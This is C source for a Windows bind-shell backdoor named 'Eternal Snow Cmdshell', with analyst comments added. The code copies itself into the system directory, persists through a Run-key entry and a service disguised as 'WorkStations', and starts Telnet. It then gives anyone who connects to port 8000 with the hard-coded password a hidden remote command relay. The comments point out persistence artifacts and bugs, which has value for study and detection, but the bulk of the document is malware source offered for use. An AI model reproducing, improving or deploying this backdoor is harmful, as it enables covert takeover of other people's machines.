Delphiscn Eternal Snow Cmdshell Version 1.0

/*

Delphiscn Eternal Snow Cmdshell Version 1.0

This backdoor is written by Delphiscn. It supports Windows NT/2000/XP/2003.
You can use nc to control a remote computer which is running this software.

Compiled and tested on Windows XP SP2 CN; 2000/2003 NOT TESTED.

Can not run in Windows 98/ME


Details

Eternal snow will create a service(Workstations) on the Remote System. And Bind Service Computer on port 8000.

Then it will also try to start the Telnet service on the remote system, which is supported on NT.

An attacker can control it IF he knows the password --Neverland.


Reference

1.msdn

2.www.xFocus.org

More Information

Delphiscn@www.EvilOctal.com
cnBlater(at)hotmail(dot)com
http://spaces.msn.com/members/delphiscn

2005-08-15*/

#include<winsock2.h>
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <winsvc.h>
#include <Psapi.h>
#pragma comment( lib,"Psapi.lib")
#pragma comment(lib, "ws2_32.lib")

#define password "Neverland"

BOOL reg(char *szExecFile);
void OnCreate();
void StartTelnet();
void Help();

/// Registers szExecFile as an auto-run entry under
/// HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
/// Analyst note (persistence artifact): writes a REG_SZ value named
/// "Kernels" whose data is the path passed in; main() passes
/// %SystemDir%\Kernels.exe. The existence check queries a value named
/// "Dlls", not "Kernels", so the write happens whenever no "Dlls" value is
/// present, regardless of whether "Kernels" is already set.
/// @param szExecFile NUL-terminated path stored as the value data.
/// @return true once the key is opened and (if needed) the value written;
///         false if the key cannot be opened with KEY_ALL_ACCESS or the
///         write fails. On the write-failure path the scratch buffer and
///         the key handle are not released.
BOOL reg(char *szExecFile)
{
HKEY hKEY;
LPCTSTR data_Set="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\";
// KEY_ALL_ACCESS on an HKLM key normally requires administrative rights.
long snow0=(::RegOpenKeyEx(HKEY_LOCAL_MACHINE, data_Set, 0, KEY_ALL_ACCESS,&hKEY));
if(snow0!=ERROR_SUCCESS) return(false);
// 80-byte scratch buffer for the query; its contents are never examined.
LPBYTE username_Get=(unsigned char*)malloc(sizeof(BYTE)*80);
DWORD cbData_1=80;
DWORD dwType;
// Only the success/failure of this query matters (see note above).
long snow1=::RegQueryValueEx(hKEY,"Dlls", 0,&dwType, username_Get,&cbData_1);
if(snow1!=ERROR_SUCCESS)
{
DWORD setsize;
setsize=strlen(szExecFile)+1; // include the terminating NUL
dwType=REG_SZ;
long snow3=::RegSetValueEx(hKEY,"Kernels", 0, dwType, (const unsigned char*) szExecFile, setsize);
if(snow3!=ERROR_SUCCESS) {return(false);} // returns without free()/RegCloseKey
}
free(username_Get);
::RegCloseKey(hKEY);
return(true);
}

/// Enables or disables one named privilege on the current process token.
/// Thanks to Sunlion[E.S.T]
/// @param lpszPrivilegeName Privilege name constant (e.g. SE_DEBUG_NAME).
/// @param bEnable TRUE to set SE_PRIVILEGE_ENABLED, FALSE to clear it.
/// @return 0 when the token cannot be opened AND 0 after the adjustment
///         is attempted (the two cases are indistinguishable to the
///         caller); 1 when the privilege name cannot be resolved. The
///         result of AdjustTokenPrivileges itself is never checked, so a
///         privilege the token does not hold fails silently.
int EnablePrivilege(LPCTSTR lpszPrivilegeName,BOOL bEnable)
{
HANDLE hToken;
TOKEN_PRIVILEGES tp;
LUID luid;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES |
TOKEN_QUERY | TOKEN_READ,&hToken))
return 0;
// On this path hToken is left open.
if(!LookupPrivilegeValue(NULL, lpszPrivilegeName, &luid))
return 1;
tp.PrivilegeCount = 1;
tp.Privileges[0].Luid = luid;
tp.Privileges[0].Attributes = (bEnable) ? SE_PRIVILEGE_ENABLED : 0;
// Return value and GetLastError() (ERROR_NOT_ALL_ASSIGNED) are ignored.
AdjustTokenPrivileges(hToken,FALSE,&tp,NULL,NULL,NULL);
CloseHandle(hToken);
return 0;
}

/// Prints the program banner (name, author contact, build note) to stdout.
/// The three lines carry no format specifiers, so they are written verbatim.
void Help()
{
static const char *const banner[] = {
"Eternal Sonw Cmdshell in Windows NT System Support For 2000/XP/2003 Version 1.0\n",
"CODE BY Delphiscn@www.EvilOctal.com E-mail:cnBlaster(at)hotmail(dot)com\n",
"Complied in Windows XP SP2 CN 2005-08"
};
for (const char *const *line = banner; line != banner + 3; ++line)
fputs(*line, stdout);
}

/// Entry point. Installs persistence, tries to start Telnet, then runs a
/// single-client, password-gated command relay on TCP port 8000.
/// Analyst note (host/network artifacts visible in this function):
///  - copies itself to %SystemDir%\Kernels.exe and registers that path
///    via reg() (Run key), OnCreate() (service "WorkStations") and
///    StartTelnet();
///  - listens on 0.0.0.0:8000, sends the banner "\n\r Welcome Hacker"
///    and the prompt "\r\n Your Password is:";
///  - spawns a hidden child from the literal command line "Kernels.exe"
///    with stdin/stdout/stderr redirected through inherited pipes and
///    relays them to the socket.
/// Only one client is ever accepted; the process exits after that session.
/// Return values of bind/listen/send/CreateProcess are not checked.
int main(int argc,char *argv[])
{
// Overwrites argv[0]'s storage with the full module path (up to 255
// bytes); that storage is not guaranteed to hold 255 bytes.
GetModuleFileName(NULL,argv[0],255);
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe"); // e.g. <system dir>\Kernels.exe
if( strcmp(argv[0],szNewPlace) != 0 )
{CopyFile(argv[0],szNewPlace,FALSE);} // FALSE: overwrite an existing copy
if(!reg(szNewPlace))
{return 0;} // Run-key write failed (typically: no admin rights) -> exit silently
OnCreate();
StartTelnet();
system("cls.exe"); // "cls" is a cmd.exe builtin; whether "cls.exe" resolves is not shown here
Help();
WSADATA wsaData;
char buff[4096]; // never zeroed or NUL-terminated before use
int Eternal;
if ((Eternal = WSAStartup(MAKEWORD(2,2), &wsaData)) != 0)
{
printf("WSAStartup Failed: %d\n",Eternal);
return -1;
}
int port=8000;
int RemoteServer,LocalClient; // SOCKET values stored in int
struct sockaddr_in addrServer,addrClient;
char *MSG="\n\r Welcome Hacker";
char *getpass="\r\n Your Password is:";
char *passok="\r\n ok";
char *error="\r\n Error Password Please Try it again";
RemoteServer=socket(AF_INET,SOCK_STREAM,0);
addrServer.sin_family=AF_INET;
addrServer.sin_port=htons(port);
addrServer.sin_addr.s_addr=ADDR_ANY; // all interfaces
int TimeOut=50000; // SO_RCVTIMEO is in milliseconds: 50 s
setsockopt(RemoteServer,SOL_SOCKET,SO_RCVTIMEO,(char*)&TimeOut,sizeof(TimeOut));
UINT bReUser=1;
setsockopt(RemoteServer,SOL_SOCKET,SO_REUSEADDR,(char*)&bReUser,sizeof(bReUser));
bind(RemoteServer,(struct sockaddr*)&addrServer,sizeof(addrServer)); // result unchecked
listen(RemoteServer,5);
printf("Bind Server is OK\n%d",port);
int iLen=sizeof(addrClient);
// Blocks until the first (and only) client connects.
LocalClient=accept(RemoteServer,(struct sockaddr*)&addrClient,&iLen);
if (LocalClient != INVALID_SOCKET)
{
int iTimeOut=50000; // 50 s receive timeout on the client socket as well
setsockopt(LocalClient,SOL_SOCKET,SO_RCVTIMEO,(char*)&iTimeOut,sizeof(iTimeOut));
}
else return -1; // RemoteServer is left open; WSACleanup is never called
send(LocalClient,MSG,strlen(MSG),0);
send(LocalClient,getpass,strlen(getpass),0);
// recv's result is unchecked and buff gets no terminator, so strstr scans
// whatever is in buff (a substring match: "Neverland" anywhere in it).
recv(LocalClient,buff,1024,0);
if(!(strstr(buff,password)))
{
send(LocalClient, error, strlen(error), 0);
printf("\r\n PassWord ERROR!");
// Closes the client socket but does not return: execution continues
// below with the closed socket value.
closesocket(LocalClient);
}
send(LocalClient, passok, strlen(passok), 0);
HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
unsigned long lBytesRead;
SECURITY_ATTRIBUTES sa;
sa.nLength=12; // sizeof(SECURITY_ATTRIBUTES) on 32-bit builds only
sa.lpSecurityDescriptor=0;
sa.bInheritHandle=TRUE; // both pipes are inheritable by the child
CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0); // child stdout/stderr -> hReadPipe1
CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0); // hWritePipe2 -> child stdin
STARTUPINFO siinfo;
char cmdLine[] = "Kernels.exe"; // not cmd.exe: relaunches this program's own image name
PROCESS_INFORMATION ProcessInformation;
ZeroMemory(&siinfo,sizeof(siinfo)); // siinfo.cb stays 0
siinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
siinfo.wShowWindow = SW_HIDE;
siinfo.hStdInput = hReadPipe2;
siinfo.hStdOutput = siinfo.hStdError = hWritePipe1;
printf("\r\n Pipe Create OK!");
// bInheritHandles=1 hands the pipe ends to the child; bread is never examined.
int bread = CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&siinfo,&ProcessInformation);
// Relay loop: pipe output -> socket when available, otherwise socket -> pipe.
while(1)
{
// Peeks up to 1024 bytes only to learn lBytesRead; its own result is unused.
int ret = PeekNamedPipe(hReadPipe1,buff,1024,&lBytesRead,0,0);
if(lBytesRead)
{
ret = ReadFile(hReadPipe1,buff,lBytesRead,&lBytesRead,0);
if(!ret) break;
ret = send(LocalClient,buff,lBytesRead,0);
if(ret <= 0) break;
}
else
{
// Blocks up to the 50 s SO_RCVTIMEO. lBytesRead is unsigned, so only a
// return of 0 (peer closed) satisfies the test below; SOCKET_ERROR (-1)
// does not and is passed on to WriteFile as a length.
lBytesRead = recv(LocalClient,buff,1024,0);
if(lBytesRead <= 0) break;
ret = WriteFile(hWritePipe2,buff,lBytesRead,&lBytesRead,0);
}
}
// Pipe handles and the child process/thread handles are not closed here.
closesocket(LocalClient);
closesocket(RemoteServer);
return 0;
}


/// Installs this program's copy (%SystemDir%\Kernels.exe) as a Windows
/// service named "WorkStations" that starts automatically at boot.
/// Analyst note (persistence artifact): the name "WorkStations" resembles
/// the built-in Workstation service (LanmanWorkstation). The service is
/// created as own-process, interactive and auto-start, with start errors
/// ignored. No StartServiceCtrlDispatcher/ServiceMain appears in this
/// file, so how the SCM treats the binary when it starts the service is
/// not shown here. All errors are silent: nothing is returned or logged.
/// Handle hygiene: on CreateService success the service handle is closed
/// but the SCM handle is not; on failure only the SCM handle is closed.
void OnCreate()
{
char szNewPlace[255];
GetSystemDirectory(szNewPlace,255);
strcat(szNewPlace,"\\Kernels.exe"); // same path main() copied itself to
// SeDebugPrivilege is requested, though the SCM calls below do not appear to need it.
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS); // local machine, full access
if (scm!=NULL)
{
scv=::CreateService(scm,
"WorkStations", // service (key) name
"WorkStations", // display name
SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS,SERVICE_INTERACTIVE_PROCESS,
SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,
szNewPlace, // binary path
NULL,NULL,NULL,NULL); // no load-order group, tag, dependencies or account (LocalSystem)
if (scv!=NULL)
{
::CloseServiceHandle(scv);
}
else
{
::CloseServiceHandle(scm);
}
}
}

/// Attempts to start the built-in "Telnet" service through the SCM.
/// Analyst note: an unexpected start of the Telnet service (SCM event or a
/// new Telnet listener) is an observable side effect of this program.
/// All failures are silent: OpenSCManager, OpenService and StartService
/// results are neither returned nor logged. SeDebugPrivilege is requested
/// first, though the SCM calls below do not appear to need it (presumably
/// copied from OnCreate).
void StartTelnet()
{
EnablePrivilege(SE_DEBUG_NAME,TRUE);
SC_HANDLE scm;
SC_HANDLE scv;
scm=::OpenSCManager(NULL,NULL,SC_MANAGER_ALL_ACCESS);
if(scm!=NULL)
{
// Opens the existing service by its key name; no arguments are passed on start.
scv=::OpenService(scm,"Telnet",SERVICE_ALL_ACCESS);
if (scv!=NULL)
{
::StartService(scv,0,NULL);
::CloseServiceHandle(scv);
}
::CloseServiceHandle(scm);
}
}

/*

Compiled with Visual C++.Net

Good Luck ^.^

*/




